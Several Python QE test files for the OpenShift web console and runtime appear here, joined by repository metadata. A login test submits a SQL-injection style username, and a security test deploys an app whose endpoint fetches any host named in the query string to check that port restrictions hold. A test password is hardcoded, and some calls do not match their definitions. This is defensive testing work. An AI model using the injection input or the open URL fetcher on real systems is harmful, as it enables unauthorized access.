self.assertEqual(text,self.driver.find_element_by_id(id_name).text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_text_regexp_match_by_css(self, text, css, msg=''):\n try: self.assertRegexpMatches(self.driver.find_element_by_css_selector(css).text,text)\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def assert_value_equal_by_id(self, value,id_name, msg=''):\n try: self.assertEqual(value,self.driver.find_element_by_id(id_name).get_attribute(\"value\"))\n except (AssertionError, NoSuchElementException) as e: self.verificationErrors.append(\"%s >> %s\"%(msg,str(e)))\n\n def is_text_equal_by_css(self, text,css):\n for i in range(60):\n try:\n if text == self.driver.find_element_by_css_selector(css).text: break\n except: pass\n time.sleep(1)\n else: self.fail(\"time out,%s is not equal to %s\" %(text,self.driver.find_element_by_css_selector(css).text))\n\n def is_text_equal_by_xpath(self, text,xpath):\n for i in range(60):\n try:\n if text == self.driver.find_element_by_xpath(xpath).text: break\n except: pass\n time.sleep(1)\n else:self.fail(\"time out,%s is not equal to %s\" %(text,self.driver.find_element_by_xpath(xpath).text))\n\n # support functions \n def click_element_by_link_text(self, link_text):\n self.wait_element_present_by_link_text(link_text)\n self.driver.find_element_by_link_text(link_text).click()\n\n def click_element_by_css(self, css):\n self.wait_element_present_by_css(self,css)\n self.driver.find_element_by_css_selector(css).click()\n\n def click_element_by_id(self, id_name):\n self.wait_element_present_by_id(id_name)\n self.driver.find_element_by_id(id_name).click()\n\n def click_element_by_xpath(self, xpath):\n self.wait_element_present_by_xpath(xpath)\n self.driver.find_element_by_xpath(xpath).click()\n\n def click_element_by_name(self, name):\n self.wait_element_present_by_name(name)\n self.driver.find_element_by_name(name).click()\n\n def click_element_by_xpath_wait(self,xpath):\n self.wait_element_present_by_xpath(xpath)\n self.driver.find_element_by_xpath(xpath).click()\n time.sleep(8) \n\n def click_element_by_class(self,class_name):\n self.wait_element_present_by_class(self,class_name)\n 
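#
# --- illustrative aside, not part of autoweb.py ---
# Condensed sketch of the wait-then-act pattern the click_*/wait_* helpers
# around here implement: poll with WebDriverWait until the element exists,
# then interact. The URL and link text are placeholder assumptions.
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait

driver = webdriver.Firefox()
try:
    driver.get("https://example.com/")
    element = WebDriverWait(driver, 60).until(
        lambda d: d.find_element(By.LINK_TEXT, "More information..."))
    element.click()  # equivalent of wait_element_present_* followed by click
finally:
    driver.quit()
# --- end aside ---
#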
self.driver.find_element_by_class_name(class_name).click()\n\n def click_element_by_css_no_wait(self,css):\n self.driver.find_element_by_css_selector(css).click()\n\n def click_element_by_id_no_wait(self,id_name):\n self.driver.find_element_by_id(id_name).click()\n\n def click_element_by_xpath_no_wait(self,xpath):\n self.driver.find_element_by_xpath(xpath).click()\n\n def click_element_by_partial_link_text_no_wait(self,partial_link_text):\n self.driver.find_element_by_partial_link_text(partial_link_text).click()\n\n def do_wait(self, element_type, element_name):\n try:\n element = WebDriverWait(self.driver, 60).until(lambda driver : driver.find_element(element_type, element_name))\n except:\n self.log.error(\"Timed out waiting for element '%s'\" % element_name)\n\n def wait_element_present_by_xpath(self,xpath):\n self.do_wait(By.XPATH, xpath)\n \n def wait_element_not_present_by_xpath(self,xpath):\n for i in range(60):\n try:\n if not is_element_present(self,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: self.fail(\"time out,%s is present\"%(xpath))\n\n def wait_element_present_by_css(self, css):\n self.do_wait(By.CSS_SELECTOR, css)\n\n def wait_element_present_by_id(self, idname):\n self.do_wait(By.ID, idname)\n\n def wait_element_present_by_class(self, class_name):\n self.do_wait(By.CLASS_NAME, class_name)\n\n\n def wait_element_present_by_name(self,name):\n self.do_wait(By.NAME, name)\n\n def go_to_home(self):\n self.driver.get(self.base_url+\"/app\")\n self.check_title(\"OpenShift by Red Hat\")\n\n def go_to_community(self):\n self.driver.get(self.base_url+\"/community\")\n self.check_title(\"Welcome to OpenShift | OpenShift by Red Hat\") \n\n def go_to_developer(self):\n self.driver.get(self.base_url+\"/community/developers\")\n self.check_title(\"Developer Center | OpenShift by Red Hat\") \n\n def go_to_pricing(self):\n self.driver.get(self.base_url+\"/pricing\")\n\n def go_to_signin(self, link_text=\"Sign In to Manage Your Apps\".upper()):\n self.click_element_by_link_text(link_text)\n self.is_element_displayed(By.ID,\"web_user_rhlogin\")\n\n def go_to_signup(self):\n self.go_to_home()\n self.scroll_to_bottom()\n self.click_element_by_xpath(\".//*[@id='bottom_signup']/div/a\")\n time.sleep(2)\n if not is_element_displayed(self,By.ID,\"signup\"):\n self.click_element_by_xpath(\".//*[@id='bottom_signup']/div/a\")\n self.is_element_displayed(By.ID,\"signup\")\n\n def go_to_partners(self):\n partner_page=self.base_url+\"/app/partners\"\n self.driver.get(partner_page)\n self.check_title(\"OpenShift by Red Hat | Meet Our Partners\")\n\n def go_to_legal(self):\n legal_page=self.base_url+\"/app/legal\"\n self.driver.get(legal_page)\n self.check_title(\"OpenShift by Red Hat | Terms and Conditions\")\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n\n\n def go_to_platformoverview(self):\n go_to_home(self)\n self.click_element_by_link_text(\"Platform Overview\")\n self.check_title(\"OpenShift by Red Hat | Cloud Platform\")\n\n def go_to_account(self):\n self.driver.get(self.base_url+\"/app/account\")\n \n \n def go_back(self): \n self.driver.back()\n time.sleep(5)\n \n def go_to_register(self):\n register_page=self.base_url+\"/app/account/new\"\n self.driver.get(register_page)\n\n def go_to_platform(self):\n platform_page=self.base_url+\"/app/platform\"\n self.driver.get(platform_page)\n\n def go_to_login(self):\n login_page=self.base_url+\"/app/login\"\n self.driver.get(login_page)\n\n def go_to_domain_edit(self):\n 
domain_edit_page=self.base_url+\"/app/domain/edit\"\n self.driver.get(domain_edit_page)\n \n def go_to_create_drupal(self):\n create_drupal_page=self.base_url+\"/app/console/application_types/drupal\"\n self.driver.get(create_drupal_page)\n\n def go_to_create_app(self, app_type):\n create_app_page=self.base_url+\"/app/console/application_types/\"+app_type\n self.driver.get(create_app_page)\n time.sleep(3)\n self.driver.refresh()\n time.sleep(2)\n\n def create_app(self, app_type, app_name):\n self.go_to_create_app(app_type)\n time.sleep(5)\n self.input_by_id(\"application_name\", app_name)\n self.click_element_by_name(\"submit\")\n time.sleep(5)\n self.driver.refresh()\n time.sleep(2)\n \n\n def go_to_app_detail(self, app_name):\n app_detail_page=self.base_url+\"/app/console/applications/\"+app_name\n self.driver.get(app_detail_page)\n time.sleep(3)\n self.driver.refresh()\n time.sleep(2)\n\n def go_to_account_page(self):\n account_page=self.base_url+\"/app/account\"\n self.driver.get(account_page)\n self.driver.refresh()\n time.sleep(2)\n\n def go_to_password_edit(self):\n password_edit_page=self.base_url+\"/app/account/password/edit\"\n self.driver.get(password_edit_page)\n self.driver.refresh()\n time.sleep(2)\n\n def delete_last_app(self, app_name):\n self.go_to_app_detail(app_name)\n time.sleep(2)\n self.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n self.click_element_by_name(\"submit\")\n time.sleep(60)\n self.go_to_app_detail(app_name)\n self.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n \n\n def delete_app(self, app_name):\n self.go_to_app_detail(app_name)\n time.sleep(2)\n self.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n self.click_element_by_name(\"submit\")\n time.sleep(60)\n self.go_to_app_detail(app_name)\n self.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n \n\n def add_cartridge(self, app_name, cartridge_name):\n self.go_to_app_detail(app_name)\n self.click_element_by_xpath('''//section[@id='app-cartridges']/div[2]/a''')\n self.click_element_by_xpath(\"//a[contains(@href, '/cartridge_types/\"+cartridge_name+\"')]\")\n self.click_element_by_id(\"cartridge_submit\")\n time.sleep(8)\n self.driver.refresh()\n time.sleep(2)\n\n def change_password(self, old_password, new_password):\n\n self.go_to_password_edit()\n self.input_by_id(\"web_user_old_password\", old_password)\n self.input_by_id(\"web_user_password\", new_password) \n self.input_by_id(\"web_user_password_confirmation\", new_password) \n self.click_element_by_name('commit')\n time.sleep(10)\n self.driver.refresh()\n time.sleep(2)\n \n\n def input_by_id(self, id_name, input_content):\n self.driver.find_element_by_id(id_name).clear()\n self.driver.find_element_by_id(id_name).send_keys(input_content)\n \n def clear_element_value(self, id_name):\n self.driver.find_element_by_id(id_name).clear()\n \n\n #############################################################\n # check & assertions\n #############################################################\n def is_element_displayed(self, how, what):\n #res = self.assert_true(self.driver.find_element(by=how,value=what).is_displayed())\n #self.info(\"xxx\", 1)\n #try:#self.assert_true(self.driver.find_element(by=how,value=what).is_displayed(),what+\" is not displayed\")\n time.sleep(4)\n self.assert_true(self.driver.find_element(by=how,value=what).is_displayed())\n #except AssertionError 
as e: self.verificationErrors.append(str(e))\n\n    def is_element_hidden(self,how,what):\n        try:self.assertFalse(self.driver.find_element(by=how,value=what).is_displayed())\n        except AssertionError as e: self.verificationErrors.append(str(e))\n\n    def wait_element_not_displayed_by_id(self,id_name):\n        try:\n            WebDriverWait(self.driver,120).until(self.driver.find_element_by_id(id_name))\n            self.assertTrue(self.driver.find_element_by_id(id_name).is_displayed())\n        except AssertionError as e: self.verificationErrors.append(str(e))\n\n    def is_text_displayed(self,text,css):\n        try:\n            WebDriverWait(self.driver, 100).until(self.driver.find_element_by_css_selector(css))\n            self.assertTrue(text == self.driver.find_element_by_css_selector(css).text)\n        except AssertionError as e: self.verificationErrors.append(str(e))\n\n    def is_text_displayed_by_id(self,text,id_name):\n        try:\n            WebDriverWait(self.driver, 100).until(self.driver.find_element_by_id(id_name))\n            self.assertTrue(text == self.driver.find_element_by_id(id_name).text)\n        except AssertionError as e: self.verificationErrors.append(str(e))\n\n\n    ## helper functions\n    def login(self):\n        username = self.config.OPENSHIFT_user_email\n        password = self.config.OPENSHIFT_user_passwd\n\n        self.go_to_login()\n        self.wait_element_present_by_id(\"web_user_rhlogin\")\n        self.input_by_id(\"web_user_rhlogin\", username)\n        self.input_by_id(\"web_user_password\", password)\n        self.click_element_by_name('''commit''')\n        time.sleep(5)\n        self.driver.refresh()\n        time.sleep(2)\n\n    def login_new(self,username,password):\n        self.go_to_login()\n        self.wait_element_present_by_id(\"web_user_rhlogin\")\n        self.input_by_id(\"web_user_rhlogin\", username)\n        self.input_by_id(\"web_user_password\", password)\n        self.click_element_by_name('''commit''')\n        time.sleep(5)\n        self.driver.refresh()\n        time.sleep(2)\n\n\n    def logout(self):\n        self.assert_element_present_by_link_text(\"Sign Out\")\n        self.click_element_by_link_text(\"Sign Out\")\n        sign_in_text=\"Sign In to Manage Your Apps\".upper()\n        self.assert_element_present_by_link_text(sign_in_text)\n\n    def __del__(self):\n        self.driver.close()\n\ndef _test(ip):\n    web = AutoWeb(ip=ip)\n    #web = AutoWeb(ip=ip, proxy=True)\n    web.go_to_home()\n    sign_in_text=\"Sign In to Manage Your Apps\".upper()\n    web.go_to_signin(sign_in_text)\n    web.assert_element_present_by_link_text(\"Forgot your password?\")\n    web.assert_element_present_by_link_text(\"create an account\")\n    web.assert_element_present_by_css(\"input.btn\")\n\ndef test_login_invalid_user(ip):\n    \"\"\" test invalid user \"\"\"\n    web = AutoWeb(ip=ip)\n    web.go_to_home()\n    web.go_to_signin()\n    # login() takes no credentials; login_new() is the parameterized variant\n    web.login_new(\"baduser\", \"vostok08\")\n    #web.assert_text_equal_by_css(\"Invalid username or password\",\"div.message.error\")\n    web.assert_text_equal_by_css(\"Invalid username or password\",\"div.alert.alert-error\")\n\ndef test_login_without_user(ip):\n    \"\"\" test_login_without_user \"\"\"\n    web = AutoWeb(ip=ip)\n    web.go_to_home()\n    web.go_to_signin()\n    web.login_new(\"\", \"vostok08\")\n    web.assert_text_equal_by_css(\"This field is required.\",\"p.help-inline\")\n\ndef test_login_without_pwd(ip):\n    web = AutoWeb(ip=ip)\n    web.go_to_home()\n    web.go_to_signin()\n    web.login_new(\"[email protected]\", \"\")\n    web.assert_text_equal_by_css(\"This field is required.\",\"p.help-inline\")\n\ndef test_login_granted_user(ip, username='[email protected]', password=\"vostok08\"):\n    log.info(\"Testing login with valid user\")\n    web = AutoWeb(ip=ip)\n    web.go_to_home()\n    web.go_to_signin()\n    web.login_new(username, 
password)\n web.check_title(\"OpenShift by Red Hat\")\n web.assert_element_present_by_link_text(\"Sign Out\")\n\ndef test_login_sql_bypass(ip):\n log.info(\"Testing login with sql bypass\")\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login(\"[email protected] or 1=1\", \"vostok08\")\n web.assert_text_equal_by_css(\"Invalid username or password\",\"div.alert\")\n\ndef test_login_session_exists(ip):\n\n web = AutoWeb(ip=ip)\n web.go_to_home()\n web.go_to_signin()\n web.login()\n web.check_title(\"OpenShift by Red Hat\")\n web.assert_element_present_by_link_text(\"Sign Out\") \n\n\ndef test_login_logout_back(ip):\n web = AutoWeb(ip=ip)\n\n web.go_to_home()\n web.go_to_signin()\n web.login()\n web.check_title(\"OpenShift by Red Hat\")\n web.assert_element_present_by_link_text(\"Sign Out\")\n web.logout()\n web.go_back()\n web.driver.refresh()\n web.assert_element_present_by_id(\"login_input\")\n\ndef test_login_cookie_deleted(self):\n web.go_to_home(self)\n web.go_to_signin(self)\n web.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(5)\n# web.wait_for_ajax(self)\n web.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n # web.assert_element_present_by_link_text(self,\"Get started!\")\n _greetings=web.generate_greetings(config.granted_user[0])\n web.assert_element_present_by_link_text(self,_greetings)\n web.assert_element_present_by_link_text(self,\"Sign out\")\n self.driver.delete_cookie(\"_rhc_session\")\n self.driver.delete_cookie(\"rh_sso\")\n self.driver.refresh()\n web.assert_element_present_by_link_text(self,\"Sign in\")\n \n\n\n \n \n \nif __name__ == '__main__':\n ip = sys.argv[1]\n\n test_login_logout_back(ip)\n #test_login_sql_bypass(ip)\n\n #web = AutoWeb(ip=ip)\n #web = AutoWeb(ip=ip, proxy=True)\n #web.go_to_home()\n #log.info(\"#################\")\n #sign_in_text=\"Sign In to Manage Your Apps\".upper()\n #web.go_to_signin(sign_in_text)\n #web.assert_element_present_by_link_text(\"Forgot your password?\")\n #web.assert_element_present_by_link_text(\"create an account\")\n #web.assert_element_present_by_css(\"input.btn\")\n \n\n #web.assert_element_present_by_css(\"a.password_reset.more\")\n" }, { "alpha_fraction": 0.5242875218391418, "alphanum_fraction": 0.5592477321624756, "avg_line_length": 35.411766052246094, "blob_id": "948a48a5368dfde536e40663fa73171f13b8780e", "content_id": "e6d175b5e3587b80858837f44a03c8c48882a949", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8667, "license_type": "no_license", "max_line_length": 119, "num_lines": 238, "path": "/automation/open/testmodules/RT/security/restrict_port_connections.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: restrict_port_connections.py\n# Date: 2012/02/29 05:36\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass ObserverGenerator(object):\n @classmethod\n def get_application(self):\n return '''\n#!/usr/bin/python\nimport os\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. 
If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \nimport urllib2\nimport socket\nimport json\n\ncontests=[ \"127.0.250.1\", \"127.0.250.129\", \"127.0.251.1\",\n \"127.0.251.129\", \"127.0.252.1\" ]\nbinders=[ \"127.0.250.2\", \"127.0.250.130\", \"127.0.251.2\",\n \"127.0.251.130\", \"127.0.252.2\" ]\ncmirror=[ \"169.254.250.1\", \"169.254.250.129\", \"169.254.251.1\",\n \"169.254.251.129\", \"169.254.252.1\" ]\nbmirror=[ \"169.254.250.2\", \"169.254.250.130\", \"169.254.251.2\",\n \"169.254.251.130\", \"169.254.252.2\" ]\n\ndef application(environ, start_response):\n\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value) for key, value in sorted(environ.items())]\n response_body = '\\\\n'.join(response_body)\n\n elif environ['PATH_INFO'] == '/open':\n ctype = 'application/json'\n body = dict()\n try:\n #callurl = \"http://\" + contests[int(environ['QUERY_STRING'])-1] + \":8080/health\"\n callurl = \"http://\" + environ['QUERY_STRING'] + \":8080/health\"\n body['callurl'] = callurl\n body['reason'] = \"OK: %s\"%(urllib2.urlopen(callurl).read())\n body['return'] = 0\n except urllib2.URLError, e:\n body['return'] = 113\n body['reason'] = \"URL Error: %s\" % str(e)\n response_body = json.dumps(body)\n except urllib2.HTTPError, e:\n response_body = '{\"return\" : 1, \"reason\" : \"HTTP Error: %s\"}' % str(e)\n except Exception, e:\n body['return'] = 1\n body['reason'] = \"Other Error: %s\" % str(e)\n\n response_body = json.dumps(body)\n \n elif environ['PATH_INFO'] == \"/bind\":\n try:\n sockhop = (binders[int(environ['QUERY_STRING'])-1], 8080)\n socksrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socksrv.bind(sockhop)\n socksrv.close()\n response_body = \"Successfully Opened %s:%d\" % sockhop\n except Exception, e:\n response_body = \"Exception: %s\\\\n\\\\n\" % str(e)\n \n elif environ['PATH_INFO'] == '/mopen':\n try:\n callurl = \"http://\" + cmirror[int(environ['QUERY_STRING'])-1] + \":8080/health\"\n response_body = urllib2.urlopen(callurl).read()\n response_body += \"\\\\n\\\\n\"\n except urllib2.URLError, e:\n response_body = \"URL Error: %s\\\\n\\\\n\" % str(e)\n except urllib2.HTTPError, e:\n response_body = \"HTTP Error: %s\\\\n\\\\n\" % str(e)\n except Exception, e:\n response_body = \"Other Error: %s\\\\n\\\\n\" % str(e)\n \n elif environ['PATH_INFO'] == \"/mbind\":\n try:\n sockhop = (bmirror[int(environ['QUERY_STRING'])-1], 8080)\n socksrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socksrv.bind(sockhop)\n socksrv.close()\n response_body = \"Successfully Opened %s:%d\" % sockhop\n except Exception, e:\n response_body = \"Exception: %s\\\\n\\\\n\" % str(e)\n\n elif environ['PATH_INFO'] == \"/mbopen\":\n try:\n sockhop = (bmirror[int(environ['QUERY_STRING'])-1], 8080)\n socksrv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socksrv.connect(sockhop)\n socksrv.close()\n response_body = \"Successfully Opened %s:%d\" % sockhop\n except Exception, e:\n response_body = \"Exception: %s\\\\n\\\\n\" % str(e)\n\n else:\n ctype = 'text/html'\n ctype = 'application/json'\n response_body = '{ \"return\" : \"200\"}'\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for 
testing only\n#\nif __name__ == \"__main__\":\n    from wsgiref.simple_server import make_server\n    httpd = make_server('localhost', 8051, application)\n    # Wait for a single request, serve it and quit.\n    httpd.handle_request()'''\n\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        self.summary = \"[US1656][Runtime][Security] Restrict port connections\"\n        self.app_name = 'portcon'\n        self.app_type = 'python'\n        try:\n            self.app_type2 = self.config.test_variant\n        except:\n            self.app_type2 = 'php'\n        tcms_testcase_id = 129219\n        self.steps_list = []\n\n        common.env_setup()\n\n    def finalize(self):\n        os.system(\"rm -rf %s %s\"%(self.app_name, self.app_name2))\n\nclass RestrictPortConnections(OpenShiftTest):\n    def test_method(self):\n        self.info(\"1. Create an observer app\")\n        ret = common.create_app(self.app_name, \n                common.app_types[self.app_type], \n                self.config.OPENSHIFT_user_email, \n                self.config.OPENSHIFT_user_passwd, \n                True)\n        self.assert_equal(ret,0, \"App should be created\")\n\n\n        self.info(\"2. Modify the observer %s\"%self.app_name)\n        ret = common.command_get_status('''\n            cd %s &&\n            cat <<EOF >wsgi/application &&\n%s\nEOF\n            git commit -m \"Changed APP\" -a && git push\n            '''%(self.app_name, ObserverGenerator.get_application()))\n        self.assert_equal(ret,0, \"App should be updated and pushed\")\n\n        for app_t in ('php', 'python', 'perl', 'rack'):\n            self.app_name2 = \"%s%s\"%(self.app_name,app_t)\n\n            self.info(\"3x. Create target App %s\"%self.app_name2)\n            ret = common.create_app(self.app_name2,\n                    common.app_types[app_t], \n                    self.config.OPENSHIFT_user_email, \n                    self.config.OPENSHIFT_user_passwd,\n                    False)\n            self.assert_equal(ret,0, \"Second application should be deployed.\")\n\n            self.info(\"4x. Verify http connection to %s\"%self.app_name2)\n            # capture the result of the check so the assertion tests it, not the stale value\n            ret = self.verify(self.app_name, self.app_name2, [('return',113)])\n            self.assert_equal(ret,0, \"It should not be allowed to connect from %s->%s\"%(self.app_name, self.app_name2))\n\n            self.info(\"5x. Delete it\")\n            ret = common.destroy_app(self.app_name2, \n                    self.config.OPENSHIFT_user_email, \n                    self.config.OPENSHIFT_user_passwd)\n            self.assert_equal(ret,0, \"App should be destroyed\")\n\n            self.info(\"6x. 
Verify self\")\n            ret = self.verify(self.app_name, self.app_name, [('return',0)])\n            self.assert_equal(ret,0, \"App should be verified\")\n\n\n        return self.passed(\"%s passed\" % self.__class__.__name__)\n\n    def get_internal_ip_address(self, app_name):\n        (status, output) = common.run_remote_cmd(app_name,'echo IP=$OPENSHIFT_INTERNAL_IP')\n        obj = re.search(r\"IP=(\\d+\\.\\d+\\.\\d+\\.\\d+)\",output)\n        if obj:\n            #print \"DEBUG: OPENSHIFT_INTERNAL_IP=%s\"%obj.group(1)\n            return obj.group(1)\n        print \"ERROR: Unable to get internal IP\"\n        return None\n\n    def verify(self, app_name, target_app_name, conditions):\n        url = OSConf.get_app_url(app_name)\n        tocheck_url = self.get_internal_ip_address(target_app_name)\n        return common.check_json_web_page(\"%s/open?%s\"%(url, tocheck_url), conditions)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(RestrictPortConnections)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of restrict_port_connections.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6273739337921143, "alphanum_fraction": 0.6509495973587036, "avg_line_length": 23.629032135009766, "blob_id": "0cd8880142a11570e856c6aafda7efdd7f876376", "content_id": "72702e56784aab0e8380dcafdd5a70c842d7d105", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1527, "license_type": "no_license", "max_line_length": 172, "num_lines": 62, "path": "/automation/open/testmodules/RT/cartridge/mongodb22.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nSept 19, 2012\n\"\"\"\nimport rhtest\nimport common\nimport database\n#### test specific import\n\n\nclass OpenShiftTest(rhtest.Test):\n\n    def initialize(self):\n        self.summary = \"[US2755] MongoDB 2.2\"\n        self.application_name = common.getRandomString()\n        self.application_type = common.app_types[\"php\"]\n\n    def record_results(self, resid):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass MongoDB22Test(OpenShiftTest):\n    def test_method(self):\n        self.info(\"=\" * 80)\n        self.info(\"Creating a PHP application\")\n        self.info(\"=\" * 80)\n        common.create_app(self.application_name, self.application_type, clone_repo = False)\n\n        self.info(\"=\" * 80)\n        self.info(\"Embedding MongoDB cartridge\")\n        self.info(\"=\" * 80)\n        common.embed(self.application_name, \"add-\" + common.cartridge_types[\"mongodb\"])\n\n        self.info(\"=\" * 80)\n        self.info(\"Checking the version of MongoDB\")\n        self.info(\"=\" * 80)\n        ( ret_code, ret_output ) = common.run_remote_cmd(self.application_name, \"eval $(cat mongodb-2.2/pid/mongodb.pid | xargs -I{} ps -p {} -o cmd= | cut -d' ' -f1) --version\")\n        self.assert_true(ret_output.find(\"db version v2.2\") != -1, \"MongoDB version must be in branch 2.2\")\n\n        # everything is OK\n        return self.passed(self.summary)\n\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(MongoDB22Test)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6606805324554443, "alphanum_fraction": 0.6625708937644958, "avg_line_length": 34.266666412353516, "blob_id": "a52ac8447274bd08f6f084badcc4e84c8a0c9794", "content_id": "5cadcb8c8008ebee8fffe0613dcda2035e6c406c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 1058, "license_type": "no_license", "max_line_length": 175, "num_lines": 30, "path": "/open_automation/bin/create_instance.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom helper import *\n\n\ndef main():\n usage = \"\"\"\nusage: %s -m devenv_xxx [-n QE_devenv_xxx] [-z xxx]\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.add_option(\"-m\", \"--ami\", dest=\"ami\", help=\"Instance Arguments: Launch openshift instance from this ami.\")\n parser.add_option(\"-n\", \"--instance_tag\", dest=\"instance_tag\", help=\"Instance Arguments: Instance tag for the newly launched instance\")\n parser.add_option(\"-z\", \"--image_size\", dest=\"image_size\", default='m1.medium', help=\"Instance Arguments: Specify size for launching instance. By default it is m1.medium\")\n\n (options, args) = parser.parse_args()\n #print \"-->\", options\n #print \"-->\", args\n create_node(options.instance_tag, options.ami, options.image_size)\n\n\n\nif __name__ == \"__main__\":\n exit_code=main()\n sys.exit(exit_code)\n" }, { "alpha_fraction": 0.677570104598999, "alphanum_fraction": 0.7196261882781982, "avg_line_length": 22.77777862548828, "blob_id": "a1432db608cbe36fbd967ab63a7fac06368b94a7", "content_id": "e0414d8da4b3a660bb7f033e59dc612df2a4d3a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 56, "num_lines": 9, "path": "/automation/debuglistener/cmdrobot.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nloglevel = \"--loglevel=DEBUG\"\nlistener = \"--listener=listener.TCMSListener:8243:52490\"\n\nproject_path = './debuglistener/keyword_driven.txt'\n\ncmd = 'pybot %s %s' % (loglevel, project_path)\nos.system(cmd)\n" }, { "alpha_fraction": 0.5673466920852661, "alphanum_fraction": 0.573975682258606, "avg_line_length": 35.76050567626953, "blob_id": "e03d2c36ab43a80026182b92960b857a30202cd3", "content_id": "32d596d3530b114016d6850eac7b0c6a06e3ab05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17499, "license_type": "no_license", "max_line_length": 109, "num_lines": 476, "path": "/automation/open/lib/nitrate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"\nUse this class to access Nitrate via XML-RPC\nThis code is based on http://landfill.bugzilla.org/testopia2/testopia/contrib/drivers/python/testopia.py\nand https://fedorahosted.org/python-bugzilla/browser/bugzilla/base.py\n\nExample on how to access this library,\n\nfrom nitrate import NitrateXmlrpc\n\nn = NitrateXmlrpc.from_config('config.cfg')\nn.testplan_get(10)\n\nwhere config.cfg looks like:\n[nitrate]\nusername: [email protected]\npassword: foobar\nurl: https://tcms.engineering.redhat.com/xmlrpc/\nuse_mod_kerb: False\n\nOr, more directly:\n\nn = NitrateXmlrpc(\n '[email protected]',\n 'foobar',\n 'https://tcms.engineering.redhat.com/xmlrpc/',\n)\nn.testplan_get(10)\n\"\"\"\n\nimport xmlrpclib, urllib2, httplib, kerberos\nfrom types import *\nfrom datetime import datetime, time\n\nfrom cookielib import CookieJar\nimport os\n\nVERBOSE = 0\nif os.getenv('RHTEST_DEBUG'):\n DEBUG = 1 \nelse:\n DEBUG = 0 \n\nclass 
CookieResponse:\n '''Fake HTTPResponse object that we can fill with headers we got elsewhere.\n We can then pass it to CookieJar.extract_cookies() to make it pull out the\n cookies from the set of headers we have.'''\n def __init__(self,headers): \n self.headers = headers\n #log.debug(\"CookieResponse() headers = %s\" % headers)\n def info(self): \n return self.headers\n\n\nclass CookieTransport(xmlrpclib.Transport):\n '''A subclass of xmlrpclib.Transport that supports cookies.'''\n cookiejar = None\n scheme = 'http'\n \n # Cribbed from xmlrpclib.Transport.send_user_agent \n def send_cookies(self, connection, cookie_request):\n if self.cookiejar is None:\n self.cookiejar = CookieJar()\n elif self.cookiejar:\n # Let the cookiejar figure out what cookies are appropriate\n self.cookiejar.add_cookie_header(cookie_request)\n # Pull the cookie headers out of the request object...\n cookielist=list()\n for h,v in cookie_request.header_items():\n if h.startswith('Cookie'):\n cookielist.append([h,v])\n # ...and put them over the connection\n for h,v in cookielist:\n connection.putheader(h,v)\n \n # This is the same request() method from xmlrpclib.Transport,\n # with a couple additions noted below\n def request_with_cookies(self, host, handler, request_body, verbose=0):\n h = self.make_connection(host)\n if verbose:\n 